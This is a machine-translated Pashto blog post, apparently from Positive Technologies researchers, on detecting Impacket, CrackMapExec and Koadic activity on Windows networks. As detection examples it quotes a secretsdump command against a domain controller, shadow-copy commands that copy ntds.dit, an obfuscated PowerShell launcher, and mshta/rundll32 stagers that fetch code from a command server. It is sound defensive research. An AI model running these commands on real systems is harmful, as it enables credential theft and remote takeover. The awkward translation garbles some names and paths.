ProHoster > بلاګ > اداره > د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه

د کارپوریټ سکټور کې د بریدونو شمیر هر کال وده کوي: د بیلګې په توګه په 2017 کې، 13٪ ډیرې ځانګړې پیښې ثبت شوي د 2016 په پرتله، او د 2018 په پای کې - 27٪ نورې پیښېد تیرې دورې په پرتله. د هغو په شمول چې اصلي کاري وسیله د وینډوز عملیاتي سیسټم دی. په 2017-2018 کې، APT Dragonfly، APT28، APT MuddyWater په اروپا، شمالي امریکا او سعودي عربستان کې پر دولتي او نظامي ادارو بریدونه وکړل. او موږ د دې لپاره درې وسیلې کارولې - امپیکټ, کریک میپیکسیک и کوډیک. د دوی سرچینې کوډ خلاص دی او په GitHub کې شتون لري.

د یادونې وړ ده چې دا وسایل د ابتدايي ننوتلو لپاره نه کارول کیږي، مګر د زیربنا دننه د برید پراختیا لپاره کارول کیږي. برید کوونکي د دوی د احاطې د ننوتلو وروسته د برید په مختلفو مرحلو کې کاروي. دا، په لاره کې، ستونزمن دی چې کشف شي او ډیری وختونه یوازې د ټیکنالوژۍ په مرسته د شبکې ترافیک کې د جوړجاړي نښې پیژندل یا هغه وسایل چې اجازه ورکوي د برید کونکي فعال فعالیتونه کشف کړئ وروسته له هغه چې زیربنا ته ننوځي. وسیلې مختلف فعالیتونه چمتو کوي ، د فایلونو لیږدولو څخه د راجسټری سره متقابل عمل او په ریموټ ماشین کې د امرونو اجرا کولو پورې. موږ د دې وسیلو مطالعه ترسره کړه ترڅو د دوی شبکې فعالیت مشخص کړي.

هغه څه چې موږ ورته اړتیا درلوده:

  • پوهیږئ چې څنګه د هیک کولو وسیلې کار کوي. ومومئ چې برید کونکي څه ګټه پورته کولو ته اړتیا لري او کوم ټیکنالوژي چې دوی یې کارولی شي.
  • هغه څه ومومئ چې د برید په لومړیو مرحلو کې د معلوماتو امنیت وسیلو لخوا ندي کشف شوي. د څارنې مرحله کیدای شي پریښودل شي، یا دا چې برید کونکی یو داخلي برید کونکی دی، یا دا چې برید کوونکی په زیربنا کې د سوراخ څخه کار اخلي چې مخکې نه و پیژندل شوی. دا ممکنه ده چې د هغه د عملونو ټول سلسله بیرته راوباسئ، له همدې امله د نور حرکت موندلو هیله.
  • د مداخلې کشف وسیلو څخه غلط مثبتونه لرې کړئ. موږ باید هیر نکړو چې کله چې ځینې کړنې یوازې د څارنې پراساس کشف شي ، مکرر غلطی ممکن وي. معمولا په زیربنا کې د هر ډول معلوماتو ترلاسه کولو لپاره کافي شمیر لارې شتون لري ، چې په لومړي نظر کې له مشروع څخه جلا کیدی شي.

دا وسایل برید کونکو ته څه ورکوي؟ که دا امپیکیټ وي، نو برید کونکي د ماډلونو لوی کتابتون ترلاسه کوي چې د برید په مختلفو مرحلو کې کارول کیدی شي چې د احاطې ماتولو وروسته تعقیب شي. ډیری وسیلې په داخلي توګه د امپیکیټ ماډلونه کاروي - د مثال په توګه ، میټاسپلایټ. دا د ریموټ کمانډ اجرا کولو لپاره dcomexec او wmiexec لري، د حافظې څخه د حسابونو ترلاسه کولو لپاره راز ډمپ چې د امپیک څخه اضافه شوي. د پایلې په توګه، د داسې کتابتون د فعالیت سمه کشف به د مشتقاتو کشف یقیني کړي.

دا کومه تصادفي نه ده چې جوړونکو د CrackMapExec (یا په ساده ډول CME) په اړه "د Impacket لخوا ځواکمن" لیکلي. برسېره پردې، CME د مشهور سناریوګانو لپاره چمتو شوي فعالیت لري: د پاسورډونو یا د دوی هشونو ترلاسه کولو لپاره Mimikatz، د لیرې پرتو اجرا کولو لپاره د میټرپریټر یا امپراتور اجنټ پلي کول، او په بورډ کې بلډ هاونډ.

دریمه وسیله چې موږ یې غوره کړه کوډیک وه. دا خورا وروستي دی، دا په 25 کې د نړیوال هیکر کنفرانس DEFCON 2017 کې وړاندې شوی او د غیر معیاري تګلارې لخوا توپیر شوی: دا د HTTP، Java Script او Microsoft Visual Basic Script (VBS) له لارې کار کوي. دا طریقه د ځمکې څخه بهر ژوند کولو ته ویل کیږي: دا وسیله په وینډوز کې جوړ شوي د انحصارونو او کتابتونونو سیټ کاروي. جوړونکي ورته د COM کمانډ او کنټرول یا C3 نوم ورکوي.

IMPACKET

د امپیکیټ فعالیت خورا پراخ دی، د AD دننه د څارنې څخه نیولې او د داخلي MS SQL سرورونو څخه د معلوماتو راټولولو پورې، د اعتبار ترلاسه کولو تخنیکونو پورې: دا د SMB ریلی برید دی، او د ntds.dit فایل ترلاسه کول چې د ډومین کنټرولر څخه د کارن پاسورډونو هش لري. امپیکیټ د څلورو مختلف میتودونو په کارولو سره په لیرې توګه کمانډونه اجرا کوي: WMI، د وینډوز مهالویش مدیریت خدمت، DCOM، او SMB، او د دې کولو لپاره اعتبار ته اړتیا لري.

د رازونو ډنډ

راځئ چې د رازونو ډمپ ته وګورو. دا یو ماډل دی چې کولی شي دواړه د کاروونکي ماشینونه او د ډومین کنټرولر په نښه کړي. دا د LSA، SAM، SECURITY، NTDS.dit د حافظې ساحو کاپي ترلاسه کولو لپاره کارول کیدی شي، نو دا د برید په مختلفو مرحلو کې لیدل کیدی شي. د ماډل په عملیاتو کې لومړی ګام د SMB له لارې تصدیق دی، کوم چې یا د کارونکي پټنوم یا د هغې هش ته اړتیا لري ترڅو په اتوماتيک ډول د پاس هاش برید ترسره کړي. بیا د خدماتو کنټرول مدیر (SCM) ته د لاسرسي خلاصولو غوښتنه راځي او د وینریګ پروتوکول له لارې راجسټری ته لاسرسی ترلاسه کوي ، چې په کارولو سره برید کونکی کولی شي د ګټو څانګو ډیټا ومومي او د SMB له لارې پایلې ترلاسه کړي.

په انځور کې. 1 موږ ګورو چې څنګه دقیقا کله چې د وینریګ پروتوکول کاروئ ، لاسرسی د LSA سره د راجسټری کیلي په کارولو سره ترلاسه کیږي. د دې کولو لپاره، د DCERPC کمانډ د opcode 15 - OpenKey سره وکاروئ.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 1. د وینریګ پروتوکول په کارولو سره د راجسټری کیلي خلاصول

بیا، کله چې کیلي ته لاسرسی ومومي، ارزښتونه د SaveKey کمانډ سره د آپکوډ 20 سره خوندي کیږي. امپیکیټ دا په خورا مشخص ډول ترسره کوي. دا ارزښتونه په هغه فایل کې خوندي کوي چې نوم یې د .tmp سره ضمیمه شوي د 8 تصادفي حروفونو تار دی. برسېره پر دې، د دې فایل نور اپلوډ د SMB له لارې د System32 لارښود (انځور 2) څخه ترسره کیږي.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 2. د ریموټ ماشین څخه د راجسټری کیلي ترلاسه کولو سکیم

دا معلومه شوه چې په شبکه کې دا ډول فعالیت د وینریګ پروتوکول، ځانګړي نومونو، قوماندې او د دوی امر په کارولو سره د راجستر ځینې څانګو ته د پوښتنو لخوا کشف کیدی شي.

دا ماډل د وینډوز پیښې لاګ کې نښې هم پریږدي ، د موندلو لپاره یې اسانه کوي. د مثال په توګه، د قوماندې د اجرا کولو په پایله کې

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

د وینډوز سرور 2016 لاګ کې به موږ د پیښو لاندې کلیدي ترتیب وګورو:

1. 4624 - ریموټ لوگون.
2. 5145 - د winreg ریموټ خدمت ته د لاسرسي حقونه چیک کول.
3. 5145 - په System32 ډایرکټر کې د فایل لاسرسي حقونه چیک کول. فایل پورته ذکر شوی تصادفي نوم لري.
4. 4688 - د cmd.exe پروسې رامینځته کول چې vssadmin پیلوي:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - د کمانډ سره د پروسې رامینځته کول:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - د کمانډ سره د پروسې رامینځته کول:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - د کمانډ سره د پروسې رامینځته کول:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

د ډیری وروسته استخراج وسیلو په څیر، امپیکیټ د لیرې څخه د امرونو اجرا کولو لپاره ماډلونه لري. موږ به په smbexec تمرکز وکړو، کوم چې په ریموټ ماشین کې د متقابل کمانډ شیل چمتو کوي. دا ماډل هم د SMB له لارې تصدیق ته اړتیا لري، یا د پاسورډ یا پاسورډ هش سره. په انځور کې. په 3 شکل کې موږ یو مثال ګورو چې دا ډول وسیله څنګه کار کوي، پدې حالت کې دا د محلي مدیر کنسول دی.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 3. متقابل smbexec کنسول

د تصدیق کولو وروسته د smbexec لومړی ګام د OpenSCManagerW کمانډ (15) سره SCM خلاصول دي. پوښتنه د پام وړ ده: د ماشین نوم ساحه DUMMY ده.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 4. د خدماتو کنټرول مدیر خلاصولو غوښتنه وکړئ

بیا، خدمت د CreateServiceW کمانډ (12) په کارولو سره رامینځته کیږي. د smbexec په حالت کې، موږ کولی شو د ورته کمانډ ساختمان منطق هر وخت وګورو. په انځور کې. 5 شنه د نه بدلیدونکي کمانډ پیرامیټرې په ګوته کوي ، ژیړ ښیي چې برید کونکی څه بدلولی شي. دا لیدل اسانه دي چې د اجرا وړ فایل نوم، د هغې ډایرکټر او د محصول فایل بدل کیدی شي، مګر پاتې نور د امپیکیټ ماډل منطق ګډوډولو پرته بدلول خورا ستونزمن دي.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 5. د خدماتو کنټرول مدیر په کارولو سره د خدماتو رامینځته کولو غوښتنه وکړئ

Smbexec د وینډوز پیښې لاګ کې څرګند نښې هم پریږدي. د وینډوز سرور 2016 لاګ کې د ipconfig کمانډ سره د متقابل کمانډ شیل لپاره ، موږ به د پیښو لاندې کلیدي ترتیب وګورو:

1. 4697 - د قرباني په ماشین کې د خدماتو نصب کول:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - د cmd.exe پروسې رامینځته کول د 1 نقطې دلیلونو سره.
3. 5145 - د C$ ډایرکټر کې د __output فایل ته د لاسرسي حقونه چیک کول.
4. 4697 - د قرباني په ماشین کې د خدماتو نصب کول.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - د cmd.exe پروسې رامینځته کول د 4 نقطې دلیلونو سره.
6. 5145 - د C$ ډایرکټر کې د __output فایل ته د لاسرسي حقونه چیک کول.

امپیکیټ د برید وسیلو پراختیا لپاره اساس دی. دا د وینډوز زیربنا کې نږدې ټولو پروتوکولونو ملاتړ کوي او په ورته وخت کې خپل ځانګړتیاوې لري. دلته ځانګړي winreg غوښتنې دي، او د ځانګړتیا قوماندې جوړښت سره د SCM API کارول، او د فایل نوم بڼه، او د SMB شریکول SYSTEM32.

CRACKMAPEXEC

د CME وسیله په ابتدايي توګه ډیزاین شوې ترڅو هغه معمول فعالیتونه اتومات کړي چې برید کونکی باید په شبکه کې د پرمختګ لپاره ترسره کړي. دا تاسو ته اجازه درکوي چې د مشهور امپراتور اجنټ او میټرپریټر سره په ګډه کار وکړئ. په پټه توګه د امرونو اجرا کولو لپاره، CME کولی شي دوی ګډوډ کړي. د بلډ هونډ (د څارنې جلا وسیله) په کارولو سره ، برید کونکی کولی شي د فعال ډومین مدیر ناستې لپاره لټون اتومات کړي.

وینه وینه

بلډ هاونډ، د یوې واحدې وسیلې په توګه، په شبکه کې د پرمختللي څارنې لپاره اجازه ورکوي. دا د کاروونکو، ماشینونو، ګروپونو، غونډو په اړه معلومات راټولوي او د PowerShell سکریپټ یا بائنری فایل په توګه چمتو کیږي. LDAP یا SMB پر بنسټ پروتوکولونه د معلوماتو راټولولو لپاره کارول کیږي. د CME ادغام ماډل بلډ هاونډ ته اجازه ورکوي چې د قرباني ماشین ته ډاونلوډ شي، د اعدام وروسته راټول شوي ډاټا چلوي او ترلاسه کړي، په دې توګه په سیسټم کې عملونه اتومات کوي او دوی لږ پام وړ کوي. د بلډ هونډ ګرافیکي شیل راټول شوي معلومات د ګرافونو په بڼه وړاندې کوي، کوم چې تاسو ته اجازه درکوي د برید کونکي ماشین څخه د ډومین مدیر ته لنډه لاره ومومئ.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 6. د بلډ هونډ انٹرفیس

د قرباني په ماشین کې د چلولو لپاره، ماډل د ATSVC او SMB په کارولو سره دنده رامینځته کوي. ATSVC د وینډوز ټاسک شیډولر سره کار کولو لپاره یو انٹرفیس دی. CME خپل NetrJobAdd (1) فنکشن کاروي ترڅو په شبکه کې دندې رامینځته کړي. د هغه څه یوه بیلګه چې د CME ماډل لیږل کیږي په انځور کې ښودل شوي. 7: دا د cmd.exe کمانډ کال دی او د XML په بڼه کې د دلیلونو په شکل کې ګډوډ شوی کوډ دی.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
انځور 7. د CME له لارې د دندې رامینځته کول

وروسته له دې چې دنده د اجرا کولو لپاره وسپارل شوه، د قرباني ماشین پخپله د بلډ هونډ پیل کوي، او دا په ټرافیک کې لیدل کیدی شي. ماډل د LDAP پوښتنو لخوا مشخص شوی ترڅو معیاري ګروپونه ترلاسه کړي، په ډومین کې د ټولو ماشینونو او کاروونکو لیست، او د SRVSVC NetSessEnum غوښتنې له لارې د فعال کاروونکي غونډو په اړه معلومات ترلاسه کړي.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 8. د SMB له لارې د فعال غونډو لیست ترلاسه کول

برسېره پردې، د قرباني په ماشین کې د بلډ هاونډ پیل کول د پلټنې فعال شوي سره د ID 4688 (د پروسې رامینځته کول) او د پروسې نوم سره د پیښې سره یوځای کیږي. «C:WindowsSystem32cmd.exe». هغه څه چې د دې په اړه د پام وړ دي د کمانډ لاین دلیلونه دي:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

د enum_avproducts ماډل د فعالیت او پلي کولو له نظره خورا په زړه پوري دی. WMI تاسو ته اجازه درکوي د WQL پوښتنو ژبه وکاروئ ترڅو د مختلف وینډوز څیزونو څخه ډیټا ترلاسه کړئ ، کوم چې په اصل کې هغه څه دي چې دا CME ماډل کاروي. دا د قربانیانو په ماشین کې نصب شوي محافظتي وسیلو په اړه د AntiSpywareProduct او AntiMirusProduct ټولګیو ته پوښتنې پیدا کوي. د اړینو معلوماتو د ترلاسه کولو لپاره، ماډل د rootSecurityCenter2 نوم ځای سره نښلوي، بیا د WQL پوښتنه رامینځته کوي او ځواب ترلاسه کوي. په انځور کې. 9 شکل د دې ډول غوښتنو او ځوابونو مینځپانګه ښیي. زموږ په مثال کې، د وینډوز مدافع وموندل شو.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 9. د enum_avproducts ماډل شبکې فعالیت

ډیری وختونه، د WMI پلټنه (Trace WMI-Activity)، په کومو پیښو کې تاسو کولی شئ د WQL پوښتنو په اړه ګټور معلومات ومومئ، ممکن غیر فعال وي. مګر که دا فعاله وي، نو که د enum_avproducts سکریپټ چلول کیږي، د ID 11 سره یوه پیښه به خوندي شي. دا به د هغه کارونکي نوم ولري چې غوښتنه یې لیږلې او نوم یې د rootSecurityCenter2 نوم ځای کې.

د CME هر ماډل خپل هنرونه درلودل، که دا ځانګړي WQL پوښتنې وي یا په LDAP او SMB کې د بلډ هانډ ځانګړي فعالیت سره د ټاسک مهالویش کې د ځانګړي ډول دندې رامینځته کول.

کواډیک

د کوډیک ځانګړی ځانګړتیا په وینډوز کې جوړ شوي جاواسکریپټ او VBScript ترجمانانو کارول دي. په دې معنی، دا د ځمکې څخه بهر ژوند تعقیبوي - دا دی، دا هیڅ بهرنی انحصار نلري او د وینډوز معیاري وسایل کاروي. دا د بشپړ کمانډ او کنټرول (CnC) لپاره یوه وسیله ده، ځکه چې د انفیکشن وروسته په ماشین کې "ایمپلانټ" نصب شوی، دا اجازه ورکوي چې کنټرول شي. دا ډول ماشین، د کواډیک په اصطلاح کې، د "زومبی" په نوم یادیږي. که چیرې د قرباني اړخ کې د بشپړ عملیاتو لپاره کافي امتیازات شتون ونلري ، کوډیک د دې وړتیا لري چې دوی د کارونکي حساب کنټرول بای پاس (UAC بای پاس) تخنیکونو په کارولو سره لوړ کړي.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 10. کواډیک شیل

قرباني باید د کمانډ او کنټرول سرور سره اړیکه پیل کړي. د دې کولو لپاره، هغه اړتیا لري چې مخکې له مخکې چمتو شوي URI سره اړیکه ونیسي او د یو سټیزر په کارولو سره اصلي کوډیک بدن ترلاسه کړي. په انځور کې. 11 شکل د mshta سټیجر لپاره یوه بیلګه ښیې.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 11. د CnC سرور سره د ناستې پیل کول

د ځواب متغیر WS پر بنسټ، دا روښانه کیږي چې اجرا کول د WScript.Shell له لارې واقع کیږي، او متغیرات STAGER، SESSIONKEY، JOBKEY، JOBKEYPATH، EXPIRE د اوسني ناستې د پیرامیټونو په اړه کلیدي معلومات لري. دا د CnC سرور سره په HTTP اړیکه کې د غوښتنې ځواب لومړۍ جوړه ده. وروسته غوښتنې په مستقیم ډول د ماډلونو (امپلانټ) په فعالیت پورې اړه لري. ټول کوډیک ماډلونه یوازې د CnC سره د فعال ناستې سره کار کوي.

Mimikatz

لکه څنګه چې CME د بلډ هونډ سره کار کوي ، کوډیک د ممیکاټز سره د جلا برنامه په توګه کار کوي او د دې پیل کولو لپاره ډیری لارې لري. لاندې د Mimikatz امپلانټ ډاونلوډ کولو لپاره د غوښتنې ځواب جوړه ده.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 12. کواډیک ته Mimikatz انتقال کړئ

تاسو کولی شئ وګورئ چې په غوښتنه کې د URI بڼه څنګه بدله شوې. دا اوس د csrf متغیر لپاره ارزښت لري، کوم چې د ټاکل شوي ماډل لپاره مسؤل دی. د هغې نوم ته پام مه کوئ؛ موږ ټول پوهیږو چې CSRF معمولا په بل ډول پوهیږي. ځواب د کوډیک ورته اصلي بدن و، کوم چې د Mimikatz پورې اړوند کوډ اضافه شوی و. دا خورا لوی دی، نو راځئ چې کلیدي ټکي وګورو. دلته موږ د Mimikatz کتابتون په بیس 64 کې کوډ شوی، یو سریال شوی .NET ټولګی چې دا به یې انجیکشن کړي، او د Mimikatz پیل کولو لپاره دلیلونه. د اعدام پایله د شبکې له لارې په روښانه متن کې لیږدول کیږي.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 13. په لیرې ماشین کې د Mimikatz چلولو پایله

Exec_cmd

کوډیک هم ماډلونه لري چې کولی شي په لیرې توګه امرونه اجرا کړي. دلته به موږ د ورته URI نسل میتود او پیژندل شوي sid او csrf متغیرونه وګورو. د exec_cmd ماډل په حالت کې، کوډ په بدن کې اضافه شوی چې د شیل امرونو اجرا کولو وړ دی. لاندې داسې کوډ ښودل شوی چې د CnC سرور HTTP ځواب کې شتون لري.

د وینډوز زیربنا باندې د بریدونو موندلو څرنګوالی: د هیکر وسیلو سپړنه
وريجې. 14. د امپلانټ کوډ exec_cmd

د GAWTUUGCFI متغیر د پیژندل شوي WS خاصیت سره د کوډ اجرا کولو لپاره اړین دی. د هغې په مرسته، امپلانټ شیل ته غږ کوي، د کوډ دوه څانګو پروسس کوي - shell.exec د محصول ډاټا جریان او shell.run پرته له بیرته راستنیدو سره.

کوډیک یوه عادي وسیله نه ده، مګر دا خپل آثار لري چې په مشروع ترافیک کې موندل کیدی شي:

  • د HTTP غوښتنو ځانګړي جوړښت،
  • د winHttpRequests API کارول،
  • د ActiveXObject له لارې د WScript.Shell څیز جوړول،
  • لوی اجرا وړ بدن.

لومړنۍ اړیکه د سټیجر لخوا پیل کیږي، نو دا ممکنه ده چې د وینډوز پیښو له لارې د دې فعالیت کشف کړئ. د mshta لپاره، دا پیښه 4688 ده، کوم چې د پیل ځانګړتیا سره د پروسې رامینځته کول په ګوته کوي:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

پداسې حال کې چې کوډیک روان دی، تاسو کولی شئ نورې 4688 پیښې د ځانګړتیاوو سره وګورئ چې په بشپړ ډول یې مشخص کوي:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

موندنو

د ځمکې څخه بهر ژوند کول د مجرمینو په منځ کې شهرت ترلاسه کوي. دوی د خپلو اړتیاو لپاره په وینډوز کې جوړ شوي وسیلې او میکانیزمونه کاروي. موږ د دې اصولو په تعقیب مشهور وسیلې Koadic، CrackMapExec او Impacket ګورو چې د APT راپورونو کې په زیاتیدونکي توګه څرګندیږي. د دې وسیلو لپاره په GitHub کې د فورکونو شمیر هم مخ په ډیریدو دی ، او نوي څرګندیږي (د دوی شاوخوا زر زره شتون لري). دا رجحان د هغې د سادګۍ له امله شهرت ترلاسه کوي: برید کونکي د دریمې ډلې وسیلو ته اړتیا نلري؛ دوی دمخه د قربانیانو په ماشینونو کې دي او د امنیتي اقداماتو په تیریدو کې ورسره مرسته کوي. موږ د شبکې د اړیکو په مطالعه تمرکز کوو: هره وسیله چې پورته تشریح شوي د شبکې ترافیک کې خپل نښې پریږدي؛ د دوی تفصيلي مطالعې موږ ته اجازه راکړه چې خپل محصول زده کړو د PT شبکې برید کشف دوی کشف کړئ، کوم چې په نهایت کې د سایبر پیښو ټول سلسله تحقیق کولو کې مرسته کوي چې دوی پکې شامل دي.

لیکوالان:

  • انتون تیورین، د متخصص خدماتو څانګې مشر، د PT متخصص امنیت مرکز، مثبت ټیکنالوژي
  • ایګور پوډموکوف، کارپوه، د PT متخصص امنیت مرکز، مثبت ټیکنالوژي

سرچینه: www.habr.com

Add a comment